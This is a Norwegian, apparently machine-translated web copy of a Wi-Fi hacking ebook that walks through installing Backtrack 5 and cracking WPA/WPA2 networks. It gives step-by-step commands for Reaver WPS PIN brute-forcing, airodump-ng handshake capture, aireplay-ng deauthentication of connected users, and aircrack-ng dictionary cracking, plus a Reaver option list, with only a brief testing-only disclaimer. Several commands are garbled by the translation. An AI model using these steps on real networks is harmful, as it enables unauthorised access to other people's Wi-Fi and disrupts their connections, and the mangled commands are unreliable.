Trinn For Trinn Backtrack 5 og grunnleggende om trådløs Hacking

5crack-WPA2-WiFi-password-using-reaver-2.jpg

Trinn For Trinn Backtrack 5 og trådløs Hacking grunnleggende

Installere Backtrack 5
Opprette En Backtrack 5 R3 Live CD
Installere På Harddisken
Installere Og kjøre Med VMware
Reaver
wpa ordbok angrep
Få et håndtrykk og en datafangst
Bruke aircrack Og en ordbok for å knekke EN wpa datafangst
www.wirelesshack.org
Trinn For Trinn Backtrack 5 og grunnleggende om trådløs Hacking
All informasjon i denne boken er kun for testing og utdanningsformål; for bruk av nettverkssikkerhetsadministratorer eller testing av sikkerheten til din egen trådløse tilkobling.

Innledning

Backtrack 5 R3 Er en beryktet Digital Rettsmedisinsk og Inntrenging Deteksjon programvarepakke med en hel masse verktøy For Penetrasjonstesting, det er basert På Linux og inkluderer 300 pluss verktøy.
hvis du aldri har brukt Backtrack før alt du virkelig trenger å vite det er den beste programvaren for Å bruke For Digital Etterforskning, Inntrenging Deteksjon og Penetrasjonstesting.
det finnes forskjellige typer trådløse angrep, men i virkeligheten brukes bare to hovedtyper. Jeg vil gå trinnvis gjennom hver. Hvis Du har Backtrack 5 installert første kapittel kan hoppes direkte til hack du ønsker å bruke.
de to hovedtyper av trådløse hack er WPA dictionary attack og Reaver.
TIDLIGERE var WEP den viktigste krypteringen som ble brukt på rutere, MEN WEP var notorisk lett å knekke og er sjelden sett lenger. WPA ELLER WPA2, som egentlig er det samme, er måten rutere nå er kryptert og mye vanskeligere å knekke.
måten du tenker på disse angrepene er like viktig som angrepene selv. Det er ikke noe pek og klikk-alternativ. Læring kommandoer og skrive dem i en terminal vindu er et must.
Å Kjøpe flere rutere å leke med er også en god ide. Det er nok å finne på verftet salg og bytte møter på billig. Ulike produsenter gjør forskjellige ting og har forskjellige oppsett, så noen har en svakhet, en annen vil ikke.
En ting å nevne er også at et internt trådløst nettverkskort ikke vil fungere Med Backtrack og trådløs penetrasjonstesting. Dette er ikke fordi adapteren ikke støttes det kan eller ikke kan være. Det er fordi de fleste trådløse brikkesett ikke støtter pakkeinjeksjoner eller de tingene som kreves for å gjøre et trådløst angrep.
Den vanligste trådløse USB-adapteren som for tiden brukes, er Alfa AWUS036H og Alfa AWUS036NH. Jeg har brukt begge og begge er gode, men om mulig får Alfa AWUS036NH fordi den støtter wireless N. Mens Alfa AWUS036H støtter wireless G.
for Å se en oppdatert liste, gå her www.wirelesshack.org/backtrack-compatible-adapters

Installere Backtrack 5

Backtrack 5 er gratis å laste ned og installere og kan lastes ned her. http://www.wirelesshack.org/backtrack-5-download
Backtrack-filen er stor 2-4 GB, avhengig av hvilken type fil du laster ned. Det er tre måter å installere Backtrack, installere på harddisken, starte OPP EN DVD eller flash-stasjon, eller kjøre den i virtualisering.
jeg vil snakke om hvordan hver installasjon fungerer, men hvis Du er ny På Backtrack 5, er den enkleste måten å brenne Backtrack 5 ISO til EN DVD eller en flash-stasjon og starte opp fra den, selvfølgelig når datamaskinen starter på nytt, kan data gå tapt hvis ikke lagret riktig.
Installere Backtrack 5 Til Harddisken er det samme som å installere Et Operativsystem, som de fleste alle er kjent med, ved å starte opp fra en disk, velge installere og svare på spørsmål som tid, dato, språk og formatering av disken.
Kjører Backtrack 5 innen virtualisering er muligens den vanligste måten. Hovedsakelig fordi et kjent operativsystem Som Windows kan kjøres samtidig og filer overføres mellom de to lett. Dette tar opp dataressurser, og kan legge til et annet lag med feilsøking hvis det oppstår et problem, for Eksempel Backtrack ikke gjenkjenner EN USB-adapter.
jeg personlig kjører Jeg VMware Player med Backtrack 5 Og Windows 7. Hvis du bare starter, vil jeg starte med Å bruke En Boot DVD, og deretter gå videre til virtualisering senere, men dette er et personlig alternativ og avhenger av din egen erfaring og kunnskap om Bruk Av Operativsystemer.

Opprette En Backtrack 5 R3 Live CD

For å starte OPP EN DVD eller Flash-stasjon, Vil Backtrack 5 ISO være nødvendig. Nedlastingen finner du her http://www.wirelesshack.org/backtrack-5-download nedlastingsstedet har nylig endret seg og må lastes ned ved Hjelp Av En Torrent. Hvis du aldri har lastet Ned En Torrent er det enkelt. Først laste ned Og installere En Torrent-Klient, Den mest populære Er Utorrent, men det er mange. Deretter klikker du på linken til torrent og klienten vil laste ned filen.

ISO brenner programvare vil være nødvendig. DU har sannsynligvis ALLEREDE ISO-brenningsprogramvare, for eksempel en bestemt Versjon Av Nero og så videre, hvis Du er i tvil, bruk Power ISO.
(jeg har ingen forbindelse Med Power ISO, det er bare det jeg bruker, så jeg skal bruke det for dette eksemplet.)

når ISO er lastet NED, laster Du Backtrack 5 ISO inn i brenningsprogramvaren og brenner den til EN DVD.

ETTER AT ISO har blitt brent TIL EN DVD, kan DEN nå brukes Som En Live CD eller brukes til å installere på harddisken.
for å starte OPP FRA DVDEN, sett den inn i datamaskinens stasjon og kontroller datamaskininnstillingene for å starte opp fra disken. De fleste datamaskiner har en boot option-knapp for å trykke eller vil automatisk starte disken.
Når den starter fra DVDEN, bør den komme til følgende meny.
Valgte det første alternativet som er «Standard Boot Text Mode» og datamaskinen vil starte opp FRA DVDEN og opp til påloggingen.
standard brukernavn og passord for Backtrack er root deretter toor.
når du er logget inn og ved ledeteksten (pound symbol #) skriv «startx» og dette vil starte det grafiske brukergrensesnittet.

Raske trinn for å lage En Backtrack 5 Live CD

  1. Last Ned Backtrack ISO http://www.wirelesshack.org/backtrack-5-download
  2. Last Ned PowerISO eller ET ISO-brennende verktøy Hvis du ikke har en. http://www.poweriso.com/download.htm 3. Installer PowerISO 4. Installer EN DVD i DVD-brenneren og åpne PowerISO.
  3. Åpne Backtrack – bildefilen I PowerISO, og klikk deretter på brenn og brenn Backtrack-bildefilen TIL DVD.
  4. Bruk DVDEN til å starte opp hvilken datamaskin du liker I Backtrack.
  5. brukernavnet er root. Passordet er toor.
  6. ved ledeteksten skriver du startx for å gå INN I GUI.

Installere På Harddisken

ethvert eksisterende Operativsystem vil bli slettet, og Bare Backtrack vil bli installert hvis dette er gjort. Av denne grunn anbefaler jeg ikke å installere på harddisken med mindre du har gjort dette før.
Backtrack kan settes opp til dual boot sammen med et eksisterende Operativsystem, men forklarer hvordan du gjør en dual boot er mer avansert. Hvis Noe går galt, vil det eksisterende Operativsystemet være borte eller skadet.
hvis Du ikke forstår Operativsystemer, bruk de andre alternativene, start opp FRA DVDEN, men ikke installer Backtrack, eller kjør Backtrack med VMware.
ISO vil være nødvendig å bli brent TIL EN DVD for å installere på harddisken. Dette er det samme som ovenfor oppstart AV DVDEN. Når Backtrack er I GUI er det en fil Backtrack.sh på skrivebordet. Dobbeltklikk dette vil installere backtrack til harddisken.

Hurtigtrinn installere Backtrack 5 til harddisken.

1 Start Backtrack Live-Miljøet.
2 Logg inn brukernavn rot, Passord toor.
3 skriv inn startx ved ledeteksten for Å gå INN I GUI.
4 * Dobbeltklikk På Installer Backtrack.sh på skrivebordet.
5 Følg instruksjonene på skjermen, for eksempel klokkeslett, datoområde og så videre.

Installere Og kjøre Med VMware

Kjører to operativsystemer samtidig er ganske vanlig nå og gjort relativt enkelt. To ting vil være nødvendig Backtrack 5 VMware Image, Og VMware Player eller Workstation.
For de som ikke vet VMware er en måte å kjøre et annet operativsystem nesten innenfor et annet operativsystem. I utgangspunktet hvis Du kjører Windows og ønsker å kjøre En Backtrack 5 installere samtidig kan du gjøre dette Med VMware.
VMware fungerer veldig bra, og så lenge du har en ganske ny datamaskin, bør den gå bra. Hvis DU har en eldre bærbar pc eller eldre datamaskin, KAN ISO være bedre. Hovedsakelig fordi EN ISO kan brennes til en disk eller en oppstartbar enhet og startes fra. Når Backtrack 5 startes av EN ISO, kjører Den Ikke Windows i bakken.
VMware workstation er ikke akkurat billig, selv om det er en gratis versjon. Det er en 30 dagers gratis prøveversjon for VMware Workstation hvis du vil sjekke det ut.
VMware Workstation er ikke gratis, men Det er en gratis versjon kalt VMware Player. VMware Player kommer ikke med alle alternativene Workstation gjør, men det fungerer, og kjører Backtrack 5 fint.
VMware Player kan lastes ned her http://www.vmware.com/products/player du må bla ned for å finne gratis nedlasting Av VMware Player.

Når Du har VMware Player, trenger Du VMware-Bildefilen fra Backtrack 5-siden her http://www.wirelesshack.org/backtrack-5-download.
VMware Image er en forhåndsinnstilt up-installasjon som kan lastes rett inn I VMware og være klar til bruk.
når Både VMware player Og Backtrack 5 VMware-bildet er lastet ned, kjør Og installer VMware Player og følg standardalternativene.

Backtrack 5 VMware-bildefilen må hentes ut og vil lage sin egen mappe med en haug med filer i den.
når det er gjort utpakking alle filene, kjøre VMware Player og høyreklikk » Åpne En Virtuell Maskin.»En dialogboks vil komme opp bare direkte det til mappen med hentet Backtrack 5 VMware image.
Bare en fil vil komme opp på grunn av det .VMX forlengelse klikk på den og du vil være i stand til å spille virtuell maskin og kjøre Backtrack 5.

Raske trinn for å installere Backtrack 5 og VMware player

  1. Last Ned VMware www.vmware.com/products/player.
  2. Last Ned Backtrack VMware-bildefilen. http://www.wirelesshack.org/backtrack – 5-last ned og pakk ut filene.
  3. Installer VMware: følg standardalternativene.
  4. når VMware er installert, gå Til Åpne En Virtuell Maskin, gå Til vmware Backtrack 5 Image file location og klikk på filen. Backtrack 5 vil åpne og komme opp til en påloggingsskjerm. Brukernavnet er root og passordet er toor.
  5. brukernavnet er root og passordet er toor. Når du er logget inn typen startx og Backtrack vil åpne i EN GUI.

Reaver

Kommandoer vi skal bruke.
airmon-ng
airmon-ng start wlan0
vask-i mon0-C
reaver-i mon0-b (BSSID) –vv
(- vv er to V ikke En W)

21.jpg

Reaver er en av de beste verktøyene for å komme sammen i lang tid. Før WPA ble implementert og wep styrte trådløs kryptering, kunne et nettverk enkelt bli sprukket. MEN DA WPA ble standarden, ble det mye vanskeligere å gjøre, ved hjelp av ordboksangrepsmetoden var det eneste virkelige alternativet. Så kom Reaver.
Reaver fungerer av en feil som finnes I rutere kalt Wps eller Wi-fi Protected Setup. WPS gjør det enkelt for trådløse enheter å finne og koble til en ruter. Problemet MED WPS er, det har en feil i det som lar noen gå rundt krypteringen.
hvis en ruter har wps aktivert, er det ikke lenger nødvendig å knekke krypteringen. Tenk på det som en bakdør.
HVIS en ruter har WPS aktivert, kan den vanligvis bli sprukket om to til ti timer.
» Wi-Fi Protected Setup, ELLER WPS. Det er en funksjon som finnes på mange rutere, ment å gi en enkel installasjonsprosess, og den er bundet TIL EN PIN som er hardkodet inn i enheten.
Reaver utnytter en feil i Disse Pinnene, og resultatet er at det med nok tid kan avsløre wpa-eller WPA2-passordet ditt. Reaver forsøker ikke å ta PÅ SEG WPA-krypteringen selv, men går rundt DEN ved HJELP AV WPS og viser deretter passordet.»(Wikipedia)
som med andre angrep er det noen problemer med dette. Slik som signalstyrke, er et sterkt signal nesten et must. Også noen rutere kan krasje hvis for mange pins blir kastet på det for å raskt som et tjenestenektangrep kan krasje EN PC.
Reaver har mange valg eller brytere det kan bruke til å håndtere disse problemene. Eksemplet jeg bruker nedenfor er en grunnleggende. Det er mange flere kommandoer å bruke Med Reaver, du kan se dem alle ved å skrive «reaver /?», eller I Vedlegget er det en fullstendig liste over kommandoene Som Kan brukes Med Reaver.
det første vi må gjøre er å aktivere den trådløse USB-adapteren.
Start Backtrack 5 og åpne to terminalvinduer.
Kjør kommandoen «airmon-ng» for å se om Backtrack gjenkjenner din trådløse USB-adapter. Det skal vise «Wlan» sammen med brikkesettet, hvis det ikke gjør det, må det gjøres noe feilsøking til det gjør det.
når den trådløse USB-adapteren fungerer, må vi aktivere den. For å gjøre dette, kjør følgende kommando «airmon-ng start wlan0»
hvis alt går bra, vil skjermen rulle med litt informasjon og si aktivert på mon0.

Å Finne EN wps-aktivert ruter er neste trinn dette pleide å være vanskelig å gjøre til kommandoen» vask » kom sammen.
kommandoen «wash» har vært beryktet for å ha problemer og ikke fungerer riktig. I utgangspunktet går kommandoen «vask» ut og forteller deg om en ruter har wps aktivert, slik at Du ikke kaster bort tiden din med Å kjøre Reaver. Jeg tror jeg har funnet en løsning som har jobbet for meg på Både Backtrack 5 og Kali Linux. Først lage en katalog som dette.
«MKdir / etc / reaver»
kjør deretter wash-kommandoen
«wash-i mon0-C»
(Det er en capitol C)
Kopier BSSID, for å lime DEN inn når det trengs senere, og trykk DERETTER CTRL + C for å stoppe terminalvinduet ved hjelp av den trådløse USB-adapteren.
(hvis ingenting kommer opp, er ingen wps-aktivert ruter innen rekkevidde. Kjør følgende kommando for å se alt tilgangspunkt innen rekkevidde. «airodump-ng mon0» (engelsk). Bare gjør dette hvis wash-kommandoen ikke finner noe)
Nå kan Vi komme til Å bruke Reaver. Pass på at terminalvinduet som kjører kommandoen» vask » ikke aktivt bruker den trådløse USB-adapteren ved å trykke CTRL+C inne i den. Du kan kopiere OG lime INN BSSID.
kjør følgende kommando i det andre terminalvinduet.
» reaver-i mon0-b (Target BSSID) – vv «
(- vv er to V ikke En W)

Reaver skal begynne å løpe.

Reaver vil nå kjøre og starte et brute force angrep mot pin-nummeret til ruteren. Den vil løpe til den finner det trådløse passordet vanligvis 2-10 timer.

wpa dictionary attack

WPA og WPA 2 er den nyeste krypteringen for trådløse enheter, så langt som å knekke dem, er de de samme, så jeg vil bruke WPA herfra.
et ordboksangrep er en av de enkleste å forstå, men minst sannsynlig å finne et passord. Dette er ofte siste utvei fordi mens det fungerer, avhenger det av ordboken som brukes og datakraften.
I Utgangspunktet fanges en datafangst av ruteren trådløst når noen logger inn i ruteren. Deretter en ordbok fil med en haug med navn og kombinasjon av navn/tall brukes til å kaste på datafangst før passordet er funnet.
hvis noen kjenner personen, kan de kanskje gjette passordet, men ellers kan dette ta lang tid og aldri finne noe. Hvis du sitter fast ved hjelp av denne metoden, vil det være avgjørende å tenke på hvordan passordet kan struktureres sammen med datakraft. Datafangst kan kopieres mellom flere datamaskiner for å dele opp tingene. A Til F på En G Til Z på en annen. Cloud computing kan være et alternativ til å utnytte noen andre datakraft og så videre.
Det finnes andre måter Som Rainbow Bord, eller skjermkort angrep, men den enkleste eller enkleste måten Å knekke WPA er å bruke Brute Force. Måten dette fungerer i utgangspunktet er at det er en stor ordbok som du bruker til å kaste så mange kombinasjoner av ord som MULIG PÅ WPA-kryptering til den sprekker. Hvis passordet er enkelt så vil det finne det raskt, hvis det er en lang omskrivning med mange forskjellige tall bokstavkombinasjoner så vil det være mye vanskeligere.

Få et håndtrykk og få en datafangst

Kommandoer som brukes.
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
Backtrack skal være oppe og går.
Åpne to terminalvinduer

Kjør kommandoen «airmon-ng» For å se OM USB-adapteren din vises, hvis DEN ikke gjør det, må det gjøres noen feilsøking om hvorfor det ikke er. For dette eksemplet bruker Jeg En Alfa AWUS036H som bruker RTL8187L-brikkesettet

Når du vet at adapteren er koblet til og opererer, kjør denne kommandoen for å få adapteren til skjermmodus.
airmon-ng start wlan0

hvis alt går bra, vil skjermen rulle med litt informasjon og si aktivert på mon0. en gang vil det aktivere på mon1 eller mon2 hvis det bruker dette.
Nå vil Vi se hvilken ruter eller tilgangspunkt (AP) som er der ute, så vi kjører denne kommandoen.
airodump-ng mon0

Her ønsker VI å målrette AP vi ønsker og kopiere BSSID. BRUK CTRL + C for å stoppe kommandoen og kopiere BSSID.
Nå vil Vi forlate den opprinnelige terminalen alene og flytte til den andre åpne terminalen. Her skal vi sette opp adapteren for å gjøre en datafangst PÅ AP-punktet vi valgte. Når vi gjør dette må vi vente på en trådløs enhet for å koble til ruteren, og det vil gjøre en datafangst. For å gjøre dette gjør vi følgende kommando.
airodump-ng-c (kanal) -w (Vårt filnavn)- bssid (BSSID AV AP) mon0
Så for meg ville det være
airodump-c 1-W MyWpaCatch –bssid 00:14:D1:EA:C4:3d mon0

da bør det gå inn i overvåking AV AP for en datafangst.

På dette punktet kan vi bare vente på at noen skal koble trådløst til ruteren. Det kan være hvilken som helst enhet deres bærbare, stasjonære eller smarte telefon. Hvis vi venter, forblir vi i passiv modus, og ingen kan oppdage at vi er der. Den nederste terminalen (i dette eksemplet) vil dukke opp OG si WPA Håndtrykk øverst til høyre når dette skjer.

det er en måte å øke hastigheten på dette hvis du vet at noen har en trådløs enhet koblet til ruteren ved å de-autentisere dem eller sparke dem og tvinge dem til å koble til igjen. Dette vil mest sannsynlig bli registrert av ruteren, så dette er ikke en passiv metode. For å gjøre dette, åpne et annet terminalvindu og skriv inn følgende.
aireplay-ng -0 5-a (Target AP BSSID) mon0
for meg ville dette være
aireplay-ng -0 5-a 00: 14: D1: EA:C4: 3d mon0

Bruke aircrack og en ordbok for å knekke EN wpa-datafangst

du bør allerede ha EN wpa-håndtrykkfil og Backtrack 5 som kjører.
standardlagringen for ET wpa-håndtrykk er under / root og vil være der under hvilket navn du kalte det. Ordboken som vi vil bruke er bygget inn backtrack under / pentest / passord / ordlister og kalles darkc0de.lst.
Å Få en god ordbok kan være vanskelig det er noen ordbøker innen Backtrack 5 som jeg vil bruke til å forklare Brute Force-metoden, men størrelsen er begrenset, noe som gjør dem ubrukelige mot alle, men det enkleste passordet.
vi bruker aircrack til å gjøre sprekkingen, og kommandoen for å gjøre dette er:
aircrack – ng (filnavn) -w (ordbokplassering)
hvor filnavnet er håndtrykkfilen du fanget og ordbokplasseringen er banen til ordboken din. Plasseringen av hvor disse to filene er og navnene deres vil være opp til deg. som jeg sa over den vanlige standardplasseringen av håndtrykkfilen er under / root og er hva du kalte det. Vi skal bruke darkc0de.lst ordbok for dette eksemplet under/pentest/passord / ordlister katalogen.
så kommandoen for meg å gjøre dette ville være:
aircrack – ng / root / mywpacatch-05.cap-w / pentest / passord / ordlister / darkc0de.lst
hvis det gjøres riktig aircrack bør starte og begynne å prøve Å knekke WPA håndtrykk fangst med ordboken.

hvis ordlisten finner det, vil det vise som nedenfor hvis ikke så en annen ordbok må brukes. For dette eksemplet redigerte jeg tekstordbokfilen og satte passordet inn for å vise hvordan det ser ut når det er funnet.

Konklusjon

informasjonen i denne boken er å gi leseren en grunnleggende oversikt over dagens hack mot trådløse rutere med Backtrack 5, og forhåpentligvis har det gjort det. Det er mange flere alternativer og brytere som kan brukes med kommandoer Som Reaver, bare skriv kommandoen da»/?»for å se de andre alternativene, for eksempel» reaver/?». I Vedlegget kan du se disse alternativene.
www.wirelesshack.org

TILLEGG

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

Påkrevde Argumenter:

-i, –interface=(wlan) navn på skjermmodusgrensesnittet som skal brukes
-b, –bssid=(mac) BSSID for MÅL-AP

Valgfrie Argumenter:

-M, –Mac=(Mac) Mac Av Vertssystemet
-E, –Essid=(Ssid) Essid Av Målet Ap
-c, –channel=(kanal) sett 802.11 kanal for grensesnittet (innebærer-f)
-o, –out-file=(file) Send utdata til en loggfil
-s, –session=(file) Gjenopprett en tidligere sesjonsfil
-C, –exec=(command) Utfør den medfølgende kommandoen ved vellykket pin recovery
-D, –daemonize Daemonize reaver
-a, –auto auto oppdag de beste avanserte alternativene for målet AP
-f, –fast deaktiver kanal hopping
-5, –5ghz bruk 5ghz 802.11 kanaler
-v, –detaljert visning ikke-kritiske advarsler (-vv for mer)
-q, –stille bare vise kritiske Meldinger
-h, –help vis hjelp

avanserte alternativer:

-p, –pin=(wps-pin) Bruk den angitte 4-eller 8-sifrede wps-pin
-d, –delay=(sekunder) Still inn forsinkelsen mellom pin-forsøk
-l, –lock-delay=(sekunder) Still inn tiden til å vente hvis AP låser wps-pin-forsøk
– g, –max-forsøk=(num) Avslutt etter num pin-forsøk
– x, –fail-wait=(sekunder) Sett tid til å sove etter 10 uventede feil
– r, –reprise-delay=<x:y> Sove i y sekunder hver x pin forsøk
-t, –timeout=(sekunder) Angi motta timeout periode
-T, –m57-timeout=(sekunder) Angi M5/M7 timeout periode
-A, –no-associate ikke knytte TIL AP (tilknytning må gjøres av et annet program)
-n, –no-nacks ikke send NACK meldinger når ut av ordre pakker er mottatt
-s, –dh-small bruk små dh-taster for å forbedre sprekkhastigheten
-l, –ignorer-låser ignorer låst tilstand rapportert av målet ap
-e, –eap-avslutte avslutt hver Wps-Økt med en eap-feilpakke
– n, –nack target ap alltid sender EN NACK
-w, –win7 Etterligne En windows 7 registrar
Eksempel:
reaver-i mon0-b 00:90:4c:C1:AC:21-vv

Leave a Reply

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert.